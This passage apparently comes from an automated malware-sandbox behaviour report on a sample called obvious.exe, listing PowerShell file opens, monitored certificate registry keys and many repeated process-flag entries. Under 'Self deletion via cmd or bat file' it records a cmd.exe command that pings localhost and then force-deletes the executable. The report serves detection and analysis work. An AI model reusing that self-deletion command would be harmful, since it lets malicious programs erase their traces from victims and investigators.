                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Self deletion via cmd or bat file
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
